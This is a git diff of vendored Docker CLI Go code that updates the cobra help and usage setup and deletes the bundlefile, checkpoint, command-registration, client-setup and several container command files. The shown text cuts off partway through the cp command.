b/vendor/github.com/docker/docker/cli/cobra.go @@ -1,9 +1,9 @@ -package cli +package cli // import "github.com/docker/docker/cli" import ( "fmt" - "strings" + "github.com/docker/docker/pkg/term" "github.com/spf13/cobra" ) @@ -14,11 +14,12 @@ func SetupRootCommand(rootCmd *cobra.Command) { cobra.AddTemplateFunc("hasManagementSubCommands", hasManagementSubCommands) cobra.AddTemplateFunc("operationSubCommands", operationSubCommands) cobra.AddTemplateFunc("managementSubCommands", managementSubCommands) + cobra.AddTemplateFunc("wrappedFlagUsages", wrappedFlagUsages) rootCmd.SetUsageTemplate(usageTemplate) rootCmd.SetHelpTemplate(helpTemplate) rootCmd.SetFlagErrorFunc(FlagErrorFunc) - rootCmd.SetHelpCommand(helpCommand) + rootCmd.SetVersionTemplate("Docker version {{.Version}}\n") rootCmd.PersistentFlags().BoolP("help", "h", false, "Print usage") rootCmd.PersistentFlags().MarkShorthandDeprecated("help", "please use --help") @@ -28,7 +29,7 @@ func 
SetupRootCommand(rootCmd *cobra.Command) { // docker/docker/cli error messages func FlagErrorFunc(cmd *cobra.Command, err error) error { if err == nil { - return err + return nil } usage := "" @@ -41,23 +42,6 @@ func FlagErrorFunc(cmd *cobra.Command, err error) error { } } -var helpCommand = &cobra.Command{ - Use: "help [command]", - Short: "Help about the command", - PersistentPreRun: func(cmd *cobra.Command, args []string) {}, - PersistentPostRun: func(cmd *cobra.Command, args []string) {}, - RunE: func(c *cobra.Command, args []string) error { - cmd, args, e := c.Root().Find(args) - if cmd == nil || e != nil || len(args) > 0 { - return fmt.Errorf("unknown help topic: %v", strings.Join(args, " ")) - } - - helpFunc := cmd.HelpFunc() - helpFunc(cmd, args) - return nil - }, -} - func hasSubCommands(cmd *cobra.Command) bool { return len(operationSubCommands(cmd)) > 0 } @@ -67,7 +51,7 @@ func hasManagementSubCommands(cmd *cobra.Command) bool { } func operationSubCommands(cmd *cobra.Command) []*cobra.Command { - cmds := []*cobra.Command{} + var cmds []*cobra.Command for _, sub := range cmd.Commands() { if sub.IsAvailableCommand() && !sub.HasSubCommands() { cmds = append(cmds, sub) @@ -76,8 +60,16 @@ func operationSubCommands(cmd *cobra.Command) []*cobra.Command { return cmds } +func wrappedFlagUsages(cmd *cobra.Command) string { + width := 80 + if ws, err := term.GetWinsize(0); err == nil { + width = int(ws.Width) + } + return cmd.Flags().FlagUsagesWrapped(width - 1) +} + func managementSubCommands(cmd *cobra.Command) []*cobra.Command { - cmds := []*cobra.Command{} + var cmds []*cobra.Command for _, sub := range cmd.Commands() { if sub.IsAvailableCommand() && sub.HasSubCommands() { cmds = append(cmds, sub) @@ -105,10 +97,10 @@ Examples: {{ .Example }} {{- end}} -{{- if .HasFlags}} +{{- if .HasAvailableFlags}} Options: -{{.Flags.FlagUsages | trimRightSpace}} +{{ wrappedFlagUsages . | trimRightSpace}} {{- end}} {{- if hasManagementSubCommands . 
}} diff --git a/vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile.go b/vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile.go deleted file mode 100644 index 7fd1e4f6c4..0000000000 --- a/vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile.go +++ /dev/null @@ -1,69 +0,0 @@ -package bundlefile - -import ( - "encoding/json" - "fmt" - "io" -) - -// Bundlefile stores the contents of a bundlefile -type Bundlefile struct { - Version string - Services map[string]Service -} - -// Service is a service from a bundlefile -type Service struct { - Image string - Command []string `json:",omitempty"` - Args []string `json:",omitempty"` - Env []string `json:",omitempty"` - Labels map[string]string `json:",omitempty"` - Ports []Port `json:",omitempty"` - WorkingDir *string `json:",omitempty"` - User *string `json:",omitempty"` - Networks []string `json:",omitempty"` -} - -// Port is a port as defined in a bundlefile -type Port struct { - Protocol string - Port uint32 -} - -// LoadFile loads a bundlefile from a path to the file -func LoadFile(reader io.Reader) (*Bundlefile, error) { - bundlefile := &Bundlefile{} - - decoder := json.NewDecoder(reader) - if err := decoder.Decode(bundlefile); err != nil { - switch jsonErr := err.(type) { - case *json.SyntaxError: - return nil, fmt.Errorf( - "JSON syntax error at byte %v: %s", - jsonErr.Offset, - jsonErr.Error()) - case *json.UnmarshalTypeError: - return nil, fmt.Errorf( - "Unexpected type at byte %v. 
Expected %s but received %s.", - jsonErr.Offset, - jsonErr.Type, - jsonErr.Value) - } - return nil, err - } - - return bundlefile, nil -} - -// Print writes the contents of the bundlefile to the output writer -// as human readable json -func Print(out io.Writer, bundle *Bundlefile) error { - bytes, err := json.MarshalIndent(*bundle, "", " ") - if err != nil { - return err - } - - _, err = out.Write(bytes) - return err -} diff --git a/vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile_test.go b/vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile_test.go deleted file mode 100644 index c343410df3..0000000000 --- a/vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile_test.go +++ /dev/null @@ -1,77 +0,0 @@ -package bundlefile - -import ( - "bytes" - "strings" - "testing" - - "github.com/docker/docker/pkg/testutil/assert" -) - -func TestLoadFileV01Success(t *testing.T) { - reader := strings.NewReader(`{ - "Version": "0.1", - "Services": { - "redis": { - "Image": "redis@sha256:4b24131101fa0117bcaa18ac37055fffd9176aa1a240392bb8ea85e0be50f2ce", - "Networks": ["default"] - }, - "web": { - "Image": "dockercloud/hello-world@sha256:fe79a2cfbd17eefc344fb8419420808df95a1e22d93b7f621a7399fd1e9dca1d", - "Networks": ["default"], - "User": "web" - } - } - }`) - - bundle, err := LoadFile(reader) - assert.NilError(t, err) - assert.Equal(t, bundle.Version, "0.1") - assert.Equal(t, len(bundle.Services), 2) -} - -func TestLoadFileSyntaxError(t *testing.T) { - reader := strings.NewReader(`{ - "Version": "0.1", - "Services": unquoted string - }`) - - _, err := LoadFile(reader) - assert.Error(t, err, "syntax error at byte 37: invalid character 'u'") -} - -func TestLoadFileTypeError(t *testing.T) { - reader := strings.NewReader(`{ - "Version": "0.1", - "Services": { - "web": { - "Image": "redis", - "Networks": "none" - } - } - }`) - - _, err := LoadFile(reader) - assert.Error(t, err, "Unexpected type at byte 94. 
Expected []string but received string") -} - -func TestPrint(t *testing.T) { - var buffer bytes.Buffer - bundle := &Bundlefile{ - Version: "0.1", - Services: map[string]Service{ - "web": { - Image: "image", - Command: []string{"echo", "something"}, - }, - }, - } - assert.NilError(t, Print(&buffer, bundle)) - output := buffer.String() - assert.Contains(t, output, "\"Image\": \"image\"") - assert.Contains(t, output, - `"Command": [ - "echo", - "something" - ]`) -} diff --git a/vendor/github.com/docker/docker/cli/command/checkpoint/cmd.go b/vendor/github.com/docker/docker/cli/command/checkpoint/cmd.go deleted file mode 100644 index d5705a4dad..0000000000 --- a/vendor/github.com/docker/docker/cli/command/checkpoint/cmd.go +++ /dev/null @@ -1,24 +0,0 @@ -package checkpoint - -import ( - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -// NewCheckpointCommand returns the `checkpoint` subcommand (only in experimental) -func NewCheckpointCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd := &cobra.Command{ - Use: "checkpoint", - Short: "Manage checkpoints", - Args: cli.NoArgs, - RunE: dockerCli.ShowHelp, - Tags: map[string]string{"experimental": "", "version": "1.25"}, - } - cmd.AddCommand( - newCreateCommand(dockerCli), - newListCommand(dockerCli), - newRemoveCommand(dockerCli), - ) - return cmd -} diff --git a/vendor/github.com/docker/docker/cli/command/checkpoint/create.go b/vendor/github.com/docker/docker/cli/command/checkpoint/create.go deleted file mode 100644 index 473a941733..0000000000 --- a/vendor/github.com/docker/docker/cli/command/checkpoint/create.go +++ /dev/null @@ -1,58 +0,0 @@ -package checkpoint - -import ( - "fmt" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type createOptions struct { - container string - checkpoint string - checkpointDir string - 
leaveRunning bool -} - -func newCreateCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts createOptions - - cmd := &cobra.Command{ - Use: "create [OPTIONS] CONTAINER CHECKPOINT", - Short: "Create a checkpoint from a running container", - Args: cli.ExactArgs(2), - RunE: func(cmd *cobra.Command, args []string) error { - opts.container = args[0] - opts.checkpoint = args[1] - return runCreate(dockerCli, opts) - }, - } - - flags := cmd.Flags() - flags.BoolVar(&opts.leaveRunning, "leave-running", false, "Leave the container running after checkpoint") - flags.StringVarP(&opts.checkpointDir, "checkpoint-dir", "", "", "Use a custom checkpoint storage directory") - - return cmd -} - -func runCreate(dockerCli *command.DockerCli, opts createOptions) error { - client := dockerCli.Client() - - checkpointOpts := types.CheckpointCreateOptions{ - CheckpointID: opts.checkpoint, - CheckpointDir: opts.checkpointDir, - Exit: !opts.leaveRunning, - } - - err := client.CheckpointCreate(context.Background(), opts.container, checkpointOpts) - if err != nil { - return err - } - - fmt.Fprintf(dockerCli.Out(), "%s\n", opts.checkpoint) - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/checkpoint/list.go b/vendor/github.com/docker/docker/cli/command/checkpoint/list.go deleted file mode 100644 index daf8349993..0000000000 --- a/vendor/github.com/docker/docker/cli/command/checkpoint/list.go +++ /dev/null @@ -1,62 +0,0 @@ -package checkpoint - -import ( - "fmt" - "text/tabwriter" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type listOptions struct { - checkpointDir string -} - -func newListCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts listOptions - - cmd := &cobra.Command{ - Use: "ls [OPTIONS] CONTAINER", - Aliases: []string{"list"}, - Short: "List checkpoints for a container", - Args: cli.ExactArgs(1), - RunE: 
func(cmd *cobra.Command, args []string) error { - return runList(dockerCli, args[0], opts) - }, - } - - flags := cmd.Flags() - flags.StringVarP(&opts.checkpointDir, "checkpoint-dir", "", "", "Use a custom checkpoint storage directory") - - return cmd - -} - -func runList(dockerCli *command.DockerCli, container string, opts listOptions) error { - client := dockerCli.Client() - - listOpts := types.CheckpointListOptions{ - CheckpointDir: opts.checkpointDir, - } - - checkpoints, err := client.CheckpointList(context.Background(), container, listOpts) - if err != nil { - return err - } - - w := tabwriter.NewWriter(dockerCli.Out(), 20, 1, 3, ' ', 0) - fmt.Fprintf(w, "CHECKPOINT NAME") - fmt.Fprintf(w, "\n") - - for _, checkpoint := range checkpoints { - fmt.Fprintf(w, "%s\t", checkpoint.Name) - fmt.Fprint(w, "\n") - } - - w.Flush() - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/checkpoint/remove.go b/vendor/github.com/docker/docker/cli/command/checkpoint/remove.go deleted file mode 100644 index ec39fa7b55..0000000000 --- a/vendor/github.com/docker/docker/cli/command/checkpoint/remove.go +++ /dev/null @@ -1,44 +0,0 @@ -package checkpoint - -import ( - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type removeOptions struct { - checkpointDir string -} - -func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts removeOptions - - cmd := &cobra.Command{ - Use: "rm [OPTIONS] CONTAINER CHECKPOINT", - Aliases: []string{"remove"}, - Short: "Remove a checkpoint", - Args: cli.ExactArgs(2), - RunE: func(cmd *cobra.Command, args []string) error { - return runRemove(dockerCli, args[0], args[1], opts) - }, - } - - flags := cmd.Flags() - flags.StringVarP(&opts.checkpointDir, "checkpoint-dir", "", "", "Use a custom checkpoint storage directory") - - return cmd -} - -func runRemove(dockerCli *command.DockerCli, 
container string, checkpoint string, opts removeOptions) error { - client := dockerCli.Client() - - removeOpts := types.CheckpointDeleteOptions{ - CheckpointID: checkpoint, - CheckpointDir: opts.checkpointDir, - } - - return client.CheckpointDelete(context.Background(), container, removeOpts) -} diff --git a/vendor/github.com/docker/docker/cli/command/cli.go b/vendor/github.com/docker/docker/cli/command/cli.go deleted file mode 100644 index 6d1dd7472e..0000000000 --- a/vendor/github.com/docker/docker/cli/command/cli.go +++ /dev/null @@ -1,260 +0,0 @@ -package command - -import ( - "errors" - "fmt" - "io" - "net/http" - "os" - "path/filepath" - "runtime" - - "github.com/docker/docker/api" - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/versions" - cliflags "github.com/docker/docker/cli/flags" - "github.com/docker/docker/cliconfig" - "github.com/docker/docker/cliconfig/configfile" - "github.com/docker/docker/cliconfig/credentials" - "github.com/docker/docker/client" - "github.com/docker/docker/dockerversion" - dopts "github.com/docker/docker/opts" - "github.com/docker/go-connections/sockets" - "github.com/docker/go-connections/tlsconfig" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -// Streams is an interface which exposes the standard input and output streams -type Streams interface { - In() *InStream - Out() *OutStream - Err() io.Writer -} - -// DockerCli represents the docker command line client. -// Instances of the client can be returned from NewDockerCli. -type DockerCli struct { - configFile *configfile.ConfigFile - in *InStream - out *OutStream - err io.Writer - keyFile string - client client.APIClient - hasExperimental bool - defaultVersion string -} - -// HasExperimental returns true if experimental features are accessible. -func (cli *DockerCli) HasExperimental() bool { - return cli.hasExperimental -} - -// DefaultVersion returns api.defaultVersion of DOCKER_API_VERSION if specified. 
-func (cli *DockerCli) DefaultVersion() string { - return cli.defaultVersion -} - -// Client returns the APIClient -func (cli *DockerCli) Client() client.APIClient { - return cli.client -} - -// Out returns the writer used for stdout -func (cli *DockerCli) Out() *OutStream { - return cli.out -} - -// Err returns the writer used for stderr -func (cli *DockerCli) Err() io.Writer { - return cli.err -} - -// In returns the reader used for stdin -func (cli *DockerCli) In() *InStream { - return cli.in -} - -// ShowHelp shows the command help. -func (cli *DockerCli) ShowHelp(cmd *cobra.Command, args []string) error { - cmd.SetOutput(cli.err) - cmd.HelpFunc()(cmd, args) - return nil -} - -// ConfigFile returns the ConfigFile -func (cli *DockerCli) ConfigFile() *configfile.ConfigFile { - return cli.configFile -} - -// GetAllCredentials returns all of the credentials stored in all of the -// configured credential stores. -func (cli *DockerCli) GetAllCredentials() (map[string]types.AuthConfig, error) { - auths := make(map[string]types.AuthConfig) - for registry := range cli.configFile.CredentialHelpers { - helper := cli.CredentialsStore(registry) - newAuths, err := helper.GetAll() - if err != nil { - return nil, err - } - addAll(auths, newAuths) - } - defaultStore := cli.CredentialsStore("") - newAuths, err := defaultStore.GetAll() - if err != nil { - return nil, err - } - addAll(auths, newAuths) - return auths, nil -} - -func addAll(to, from map[string]types.AuthConfig) { - for reg, ac := range from { - to[reg] = ac - } -} - -// CredentialsStore returns a new credentials store based -// on the settings provided in the configuration file. Empty string returns -// the default credential store. 
-func (cli *DockerCli) CredentialsStore(serverAddress string) credentials.Store { - if helper := getConfiguredCredentialStore(cli.configFile, serverAddress); helper != "" { - return credentials.NewNativeStore(cli.configFile, helper) - } - return credentials.NewFileStore(cli.configFile) -} - -// getConfiguredCredentialStore returns the credential helper configured for the -// given registry, the default credsStore, or the empty string if neither are -// configured. -func getConfiguredCredentialStore(c *configfile.ConfigFile, serverAddress string) string { - if c.CredentialHelpers != nil && serverAddress != "" { - if helper, exists := c.CredentialHelpers[serverAddress]; exists { - return helper - } - } - return c.CredentialsStore -} - -// Initialize the dockerCli runs initialization that must happen after command -// line flags are parsed. -func (cli *DockerCli) Initialize(opts *cliflags.ClientOptions) error { - cli.configFile = LoadDefaultConfigFile(cli.err) - - var err error - cli.client, err = NewAPIClientFromFlags(opts.Common, cli.configFile) - if err != nil { - return err - } - - cli.defaultVersion = cli.client.ClientVersion() - - if opts.Common.TrustKey == "" { - cli.keyFile = filepath.Join(cliconfig.ConfigDir(), cliflags.DefaultTrustKeyFile) - } else { - cli.keyFile = opts.Common.TrustKey - } - - if ping, err := cli.client.Ping(context.Background()); err == nil { - cli.hasExperimental = ping.Experimental - - // since the new header was added in 1.25, assume server is 1.24 if header is not present. - if ping.APIVersion == "" { - ping.APIVersion = "1.24" - } - - // if server version is lower than the current cli, downgrade - if versions.LessThan(ping.APIVersion, cli.client.ClientVersion()) { - cli.client.UpdateClientVersion(ping.APIVersion) - } - } - return nil -} - -// NewDockerCli returns a DockerCli instance with IO output and error streams set by in, out and err. 
-func NewDockerCli(in io.ReadCloser, out, err io.Writer) *DockerCli { - return &DockerCli{in: NewInStream(in), out: NewOutStream(out), err: err} -} - -// LoadDefaultConfigFile attempts to load the default config file and returns -// an initialized ConfigFile struct if none is found. -func LoadDefaultConfigFile(err io.Writer) *configfile.ConfigFile { - configFile, e := cliconfig.Load(cliconfig.ConfigDir()) - if e != nil { - fmt.Fprintf(err, "WARNING: Error loading config file:%v\n", e) - } - if !configFile.ContainsAuth() { - credentials.DetectDefaultStore(configFile) - } - return configFile -} - -// NewAPIClientFromFlags creates a new APIClient from command line flags -func NewAPIClientFromFlags(opts *cliflags.CommonOptions, configFile *configfile.ConfigFile) (client.APIClient, error) { - host, err := getServerHost(opts.Hosts, opts.TLSOptions) - if err != nil { - return &client.Client{}, err - } - - customHeaders := configFile.HTTPHeaders - if customHeaders == nil { - customHeaders = map[string]string{} - } - customHeaders["User-Agent"] = UserAgent() - - verStr := api.DefaultVersion - if tmpStr := os.Getenv("DOCKER_API_VERSION"); tmpStr != "" { - verStr = tmpStr - } - - httpClient, err := newHTTPClient(host, opts.TLSOptions) - if err != nil { - return &client.Client{}, err - } - - return client.NewClient(host, verStr, httpClient, customHeaders) -} - -func getServerHost(hosts []string, tlsOptions *tlsconfig.Options) (host string, err error) { - switch len(hosts) { - case 0: - host = os.Getenv("DOCKER_HOST") - case 1: - host = hosts[0] - default: - return "", errors.New("Please specify only one -H") - } - - host, err = dopts.ParseHost(tlsOptions != nil, host) - return -} - -func newHTTPClient(host string, tlsOptions *tlsconfig.Options) (*http.Client, error) { - if tlsOptions == nil { - // let the api client configure the default transport. 
- return nil, nil - } - - config, err := tlsconfig.Client(*tlsOptions) - if err != nil { - return nil, err - } - tr := &http.Transport{ - TLSClientConfig: config, - } - proto, addr, _, err := client.ParseHost(host) - if err != nil { - return nil, err - } - - sockets.ConfigureTransport(tr, proto, addr) - - return &http.Client{ - Transport: tr, - }, nil -} - -// UserAgent returns the user agent string used for making API requests -func UserAgent() string { - return "Docker-Client/" + dockerversion.Version + " (" + runtime.GOOS + ")" -} diff --git a/vendor/github.com/docker/docker/cli/command/commands/commands.go b/vendor/github.com/docker/docker/cli/command/commands/commands.go deleted file mode 100644 index d64d5680cc..0000000000 --- a/vendor/github.com/docker/docker/cli/command/commands/commands.go +++ /dev/null @@ -1,91 +0,0 @@ -package commands - -import ( - "os" - - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/checkpoint" - "github.com/docker/docker/cli/command/container" - "github.com/docker/docker/cli/command/image" - "github.com/docker/docker/cli/command/network" - "github.com/docker/docker/cli/command/node" - "github.com/docker/docker/cli/command/plugin" - "github.com/docker/docker/cli/command/registry" - "github.com/docker/docker/cli/command/secret" - "github.com/docker/docker/cli/command/service" - "github.com/docker/docker/cli/command/stack" - "github.com/docker/docker/cli/command/swarm" - "github.com/docker/docker/cli/command/system" - "github.com/docker/docker/cli/command/volume" - "github.com/spf13/cobra" -) - -// AddCommands adds all the commands from cli/command to the root command -func AddCommands(cmd *cobra.Command, dockerCli *command.DockerCli) { - cmd.AddCommand( - node.NewNodeCommand(dockerCli), - service.NewServiceCommand(dockerCli), - swarm.NewSwarmCommand(dockerCli), - secret.NewSecretCommand(dockerCli), - container.NewContainerCommand(dockerCli), - image.NewImageCommand(dockerCli), - 
system.NewSystemCommand(dockerCli), - container.NewRunCommand(dockerCli), - image.NewBuildCommand(dockerCli), - network.NewNetworkCommand(dockerCli), - hide(system.NewEventsCommand(dockerCli)), - registry.NewLoginCommand(dockerCli), - registry.NewLogoutCommand(dockerCli), - registry.NewSearchCommand(dockerCli), - system.NewVersionCommand(dockerCli), - volume.NewVolumeCommand(dockerCli), - hide(system.NewInfoCommand(dockerCli)), - hide(container.NewAttachCommand(dockerCli)), - hide(container.NewCommitCommand(dockerCli)), - hide(container.NewCopyCommand(dockerCli)), - hide(container.NewCreateCommand(dockerCli)), - hide(container.NewDiffCommand(dockerCli)), - hide(container.NewExecCommand(dockerCli)), - hide(container.NewExportCommand(dockerCli)), - hide(container.NewKillCommand(dockerCli)), - hide(container.NewLogsCommand(dockerCli)), - hide(container.NewPauseCommand(dockerCli)), - hide(container.NewPortCommand(dockerCli)), - hide(container.NewPsCommand(dockerCli)), - hide(container.NewRenameCommand(dockerCli)), - hide(container.NewRestartCommand(dockerCli)), - hide(container.NewRmCommand(dockerCli)), - hide(container.NewStartCommand(dockerCli)), - hide(container.NewStatsCommand(dockerCli)), - hide(container.NewStopCommand(dockerCli)), - hide(container.NewTopCommand(dockerCli)), - hide(container.NewUnpauseCommand(dockerCli)), - hide(container.NewUpdateCommand(dockerCli)), - hide(container.NewWaitCommand(dockerCli)), - hide(image.NewHistoryCommand(dockerCli)), - hide(image.NewImagesCommand(dockerCli)), - hide(image.NewImportCommand(dockerCli)), - hide(image.NewLoadCommand(dockerCli)), - hide(image.NewPullCommand(dockerCli)), - hide(image.NewPushCommand(dockerCli)), - hide(image.NewRemoveCommand(dockerCli)), - hide(image.NewSaveCommand(dockerCli)), - hide(image.NewTagCommand(dockerCli)), - hide(system.NewInspectCommand(dockerCli)), - stack.NewStackCommand(dockerCli), - stack.NewTopLevelDeployCommand(dockerCli), - checkpoint.NewCheckpointCommand(dockerCli), - 
plugin.NewPluginCommand(dockerCli), - ) - -} - -func hide(cmd *cobra.Command) *cobra.Command { - if os.Getenv("DOCKER_HIDE_LEGACY_COMMANDS") == "" { - return cmd - } - cmdCopy := *cmd - cmdCopy.Hidden = true - cmdCopy.Aliases = []string{} - return &cmdCopy -} diff --git a/vendor/github.com/docker/docker/cli/command/container/attach.go b/vendor/github.com/docker/docker/cli/command/container/attach.go deleted file mode 100644 index 31bb109344..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/attach.go +++ /dev/null @@ -1,130 +0,0 @@ -package container - -import ( - "fmt" - "io" - "net/http/httputil" - - "golang.org/x/net/context" - - "github.com/Sirupsen/logrus" - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/pkg/signal" - "github.com/spf13/cobra" -) - -type attachOptions struct { - noStdin bool - proxy bool - detachKeys string - - container string -} - -// NewAttachCommand creates a new cobra.Command for `docker attach` -func NewAttachCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts attachOptions - - cmd := &cobra.Command{ - Use: "attach [OPTIONS] CONTAINER", - Short: "Attach to a running container", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.container = args[0] - return runAttach(dockerCli, &opts) - }, - } - - flags := cmd.Flags() - flags.BoolVar(&opts.noStdin, "no-stdin", false, "Do not attach STDIN") - flags.BoolVar(&opts.proxy, "sig-proxy", true, "Proxy all received signals to the process") - flags.StringVar(&opts.detachKeys, "detach-keys", "", "Override the key sequence for detaching a container") - return cmd -} - -func runAttach(dockerCli *command.DockerCli, opts *attachOptions) error { - ctx := context.Background() - client := dockerCli.Client() - - c, err := client.ContainerInspect(ctx, opts.container) - if err != nil { - return err - } - - if !c.State.Running { - return 
fmt.Errorf("You cannot attach to a stopped container, start it first") - } - - if c.State.Paused { - return fmt.Errorf("You cannot attach to a paused container, unpause it first") - } - - if err := dockerCli.In().CheckTty(!opts.noStdin, c.Config.Tty); err != nil { - return err - } - - if opts.detachKeys != "" { - dockerCli.ConfigFile().DetachKeys = opts.detachKeys - } - - options := types.ContainerAttachOptions{ - Stream: true, - Stdin: !opts.noStdin && c.Config.OpenStdin, - Stdout: true, - Stderr: true, - DetachKeys: dockerCli.ConfigFile().DetachKeys, - } - - var in io.ReadCloser - if options.Stdin { - in = dockerCli.In() - } - - if opts.proxy && !c.Config.Tty { - sigc := ForwardAllSignals(ctx, dockerCli, opts.container) - defer signal.StopCatch(sigc) - } - - resp, errAttach := client.ContainerAttach(ctx, opts.container, options) - if errAttach != nil && errAttach != httputil.ErrPersistEOF { - // ContainerAttach returns an ErrPersistEOF (connection closed) - // means server met an error and put it in Hijacked connection - // keep the error and read detailed error message from hijacked connection later - return errAttach - } - defer resp.Close() - - if c.Config.Tty && dockerCli.Out().IsTerminal() { - height, width := dockerCli.Out().GetTtySize() - // To handle the case where a user repeatedly attaches/detaches without resizing their - // terminal, the only way to get the shell prompt to display for attaches 2+ is to artificially - // resize it, then go back to normal. Without this, every attach after the first will - // require the user to manually resize or hit enter. - resizeTtyTo(ctx, client, opts.container, height+1, width+1, false) - - // After the above resizing occurs, the call to MonitorTtySize below will handle resetting back - // to the actual size. 
- if err := MonitorTtySize(ctx, dockerCli, opts.container, false); err != nil { - logrus.Debugf("Error monitoring TTY size: %s", err) - } - } - if err := holdHijackedConnection(ctx, dockerCli, c.Config.Tty, in, dockerCli.Out(), dockerCli.Err(), resp); err != nil { - return err - } - - if errAttach != nil { - return errAttach - } - - _, status, err := getExitCode(ctx, dockerCli, opts.container) - if err != nil { - return err - } - if status != 0 { - return cli.StatusError{StatusCode: status} - } - - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/container/cmd.go b/vendor/github.com/docker/docker/cli/command/container/cmd.go deleted file mode 100644 index 3e9b4880ac..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/cmd.go +++ /dev/null @@ -1,46 +0,0 @@ -package container - -import ( - "github.com/spf13/cobra" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" -) - -// NewContainerCommand returns a cobra command for `container` subcommands -func NewContainerCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd := &cobra.Command{ - Use: "container", - Short: "Manage containers", - Args: cli.NoArgs, - RunE: dockerCli.ShowHelp, - } - cmd.AddCommand( - NewAttachCommand(dockerCli), - NewCommitCommand(dockerCli), - NewCopyCommand(dockerCli), - NewCreateCommand(dockerCli), - NewDiffCommand(dockerCli), - NewExecCommand(dockerCli), - NewExportCommand(dockerCli), - NewKillCommand(dockerCli), - NewLogsCommand(dockerCli), - NewPauseCommand(dockerCli), - NewPortCommand(dockerCli), - NewRenameCommand(dockerCli), - NewRestartCommand(dockerCli), - NewRmCommand(dockerCli), - NewRunCommand(dockerCli), - NewStartCommand(dockerCli), - NewStatsCommand(dockerCli), - NewStopCommand(dockerCli), - NewTopCommand(dockerCli), - NewUnpauseCommand(dockerCli), - NewUpdateCommand(dockerCli), - NewWaitCommand(dockerCli), - newListCommand(dockerCli), - newInspectCommand(dockerCli), - NewPruneCommand(dockerCli), - ) - return 
cmd -} diff --git a/vendor/github.com/docker/docker/cli/command/container/commit.go b/vendor/github.com/docker/docker/cli/command/container/commit.go deleted file mode 100644 index cf8d0102a6..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/commit.go +++ /dev/null @@ -1,76 +0,0 @@ -package container - -import ( - "fmt" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - dockeropts "github.com/docker/docker/opts" - "github.com/spf13/cobra" -) - -type commitOptions struct { - container string - reference string - - pause bool - comment string - author string - changes dockeropts.ListOpts -} - -// NewCommitCommand creates a new cobra.Command for `docker commit` -func NewCommitCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts commitOptions - - cmd := &cobra.Command{ - Use: "commit [OPTIONS] CONTAINER [REPOSITORY[:TAG]]", - Short: "Create a new image from a container's changes", - Args: cli.RequiresRangeArgs(1, 2), - RunE: func(cmd *cobra.Command, args []string) error { - opts.container = args[0] - if len(args) > 1 { - opts.reference = args[1] - } - return runCommit(dockerCli, &opts) - }, - } - - flags := cmd.Flags() - flags.SetInterspersed(false) - - flags.BoolVarP(&opts.pause, "pause", "p", true, "Pause container during commit") - flags.StringVarP(&opts.comment, "message", "m", "", "Commit message") - flags.StringVarP(&opts.author, "author", "a", "", "Author (e.g., \"John Hannibal Smith \")") - - opts.changes = dockeropts.NewListOpts(nil) - flags.VarP(&opts.changes, "change", "c", "Apply Dockerfile instruction to the created image") - - return cmd -} - -func runCommit(dockerCli *command.DockerCli, opts *commitOptions) error { - ctx := context.Background() - - name := opts.container - reference := opts.reference - - options := types.ContainerCommitOptions{ - Reference: reference, - Comment: opts.comment, - Author: opts.author, - 
Changes: opts.changes.GetAll(), - Pause: opts.pause, - } - - response, err := dockerCli.Client().ContainerCommit(ctx, name, options) - if err != nil { - return err - } - - fmt.Fprintln(dockerCli.Out(), response.ID) - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/container/cp.go b/vendor/github.com/docker/docker/cli/command/container/cp.go deleted file mode 100644 index 17ab2accf9..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/cp.go +++ /dev/null @@ -1,303 +0,0 @@ -package container - -import ( - "fmt" - "io" - "os" - "path/filepath" - "strings" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/pkg/archive" - "github.com/docker/docker/pkg/system" - "github.com/spf13/cobra" -) - -type copyOptions struct { - source string - destination string - followLink bool -} - -type copyDirection int - -const ( - fromContainer copyDirection = (1 << iota) - toContainer - acrossContainers = fromContainer | toContainer -) - -type cpConfig struct { - followLink bool -} - -// NewCopyCommand creates a new `docker cp` command -func NewCopyCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts copyOptions - - cmd := &cobra.Command{ - Use: `cp [OPTIONS] CONTAINER:SRC_PATH DEST_PATH|- - docker cp [OPTIONS] SRC_PATH|- CONTAINER:DEST_PATH`, - Short: "Copy files/folders between a container and the local filesystem", - Long: strings.Join([]string{ - "Copy files/folders between a container and the local filesystem\n", - "\nUse '-' as the source to read a tar archive from 